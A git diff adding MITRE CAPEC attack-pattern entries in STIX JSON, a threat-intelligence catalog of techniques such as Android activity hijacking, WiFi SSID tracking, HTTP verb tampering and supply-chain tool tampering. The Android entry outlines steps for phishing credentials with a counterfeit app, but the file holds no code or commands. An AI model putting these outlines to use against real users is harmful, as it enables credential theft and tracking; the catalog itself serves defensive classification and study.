a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json new file mode 100644 index 0000000000000000000000000000000000000000..702b8c542cbaa687ffe64bb99ad1a6d1f35a6fd3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json @@ -0,0 +1,64 @@ +{ + "id": "bundle--d682dbcb-07ca-4e22-a664-4724cafe23af", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "external_id": "CAPEC-501", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Activity Hijack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.

    2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter

  2. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.

    2. Techniques
    Gather login information from a user using a malicious app
", + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json new file mode 100644 index 0000000000000000000000000000000000000000..e39f7263307391caea16e3dd5adcadcecafd12ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json @@ -0,0 +1,53 @@ +{ + "id": "bundle--8efa1452-d03c-417d-998f-1f833db3c07c", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-613", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/613.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "modified": "2019-09-30T00:00:00.000Z", + "name": "WiFi SSID Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json new file mode 100644 index 0000000000000000000000000000000000000000..af382c1312db5d559b3346c944da8d380f20cf3a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--11689e7a-d662-4cfa-814f-8a2e94683428", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-257", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/257.html" + } + ], + "id": "attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Abuse of Transaction Data Structure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json new file mode 100644 index 0000000000000000000000000000000000000000..433bbda16a61d3c952c143d0c57b7cc94415e420 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json @@ -0,0 +1,85 @@ +{ + "id": "bundle--d78ba103-338b-462f-a8db-153e92284a36", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "external_id": "CAPEC-324", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json new file mode 100644 index 0000000000000000000000000000000000000000..1f2e05718aa81cbe7e2c8cd776653d795d79643c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json @@ -0,0 +1,59 @@ +{ + "id": "bundle--cad44c79-b3ba-42d6-93ce-89cdb3befa22", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.", + "external_references": [ + { + "external_id": "CAPEC-240", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/240.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "description": "Resource Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Resource_Injection" + } + ], + "id": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Resource Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4" + ], + "x_capec_prerequisites": [ + "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json new file mode 100644 index 0000000000000000000000000000000000000000..c887de2ca98c1d6945525a17ca5bd26c63d321a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json @@ -0,0 +1,65 @@ +{ + "id": "bundle--e26b8616-972a-47ce-bee1-2c335e9181c6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "external_id": "CAPEC-438", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, Inc.", + "external_id": "REF-380", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Modification During Manufacture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json new file mode 100644 index 0000000000000000000000000000000000000000..0015a72e0a704daeb031fdd25d3e20be1bdb7c15 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json @@ -0,0 +1,53 @@ +{ + "id": "bundle--7dadb93b-5322-4b16-811c-f211aab9a108", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-441", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Logic Insertion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_prerequisites": [ + "Access to the component currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json new file mode 100644 index 0000000000000000000000000000000000000000..9decdec517475dcc5a8b208e6c95a7064391db80 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json @@ -0,0 +1,58 @@ +{ + "id": "bundle--1283bd89-4a96-4e99-9a70-60d628ee9b35", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.", + "external_references": [ + { + "external_id": "CAPEC-274", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/274.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Arshan Dabirsiaghi, Bypassing Web Authentication and Authorization with HTTP Verb Tampering: How to inadvertently allow attackers full access to your web application, Aspect Security", + "external_id": "REF-118", + "source_name": "reference_from_CAPEC", + "url": "http://mirror.transact.net.au/sourceforge/w/project/wa/waspap/waspap/Core/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf" + } + ], + "id": "attack-pattern--13d1d169-0023-41e2-952f-7d794844733b", + "modified": "2019-09-30T00:00:00.000Z", + "name": "HTTP Verb Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted system must attempt to filter access based on the HTTP verb used in requests." + ], + "x_capec_resources_required": [ + "The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json new file mode 100644 index 0000000000000000000000000000000000000000..2314680ed4d2c3b9c2006a8de9105d2a9b3a9484 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json @@ -0,0 +1,51 @@ +{ + "id": "bundle--4510fc1b-17b0-4be6-a403-b391ba609970", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.", + "external_references": [ + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Modify Existing Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json new file mode 100644 index 0000000000000000000000000000000000000000..2e96944d7f0f8e6887fd2c8ae06ba76f8e13d70f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json @@ -0,0 +1,68 @@ +{ + "id": "bundle--1fa5737d-ae59-42f4-b4be-84e0c9983849", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-648", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/648.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Screen Capture", + "external_id": "T1113", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1113" + }, + { + "description": "Screen Capture", + "external_id": "T1513", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1513" + } + ], + "id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Screen Capture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to capture potentially sensitive information and processes as they appear on the screen.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json new file mode 100644 index 0000000000000000000000000000000000000000..ceaf7071cc284f8a9d4abb9577c175daa4239105 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json @@ -0,0 +1,92 @@ +{ + "id": "bundle--8eb54728-98d7-47c9-b501-cd2f38a65bc7", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.", + "external_references": [ + { + "external_id": "CAPEC-670", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/670.html" + }, + { + "description": "Trusted Developer Utilities Proxy Execution", + "external_id": "T1127", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1127" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor, 2020--12---13, Schneier on Security", + "external_id": "REF-667", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + } + ], + "id": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Software Development Tools Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software." + ], + "x_capec_skills_required": { + "High": "Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git 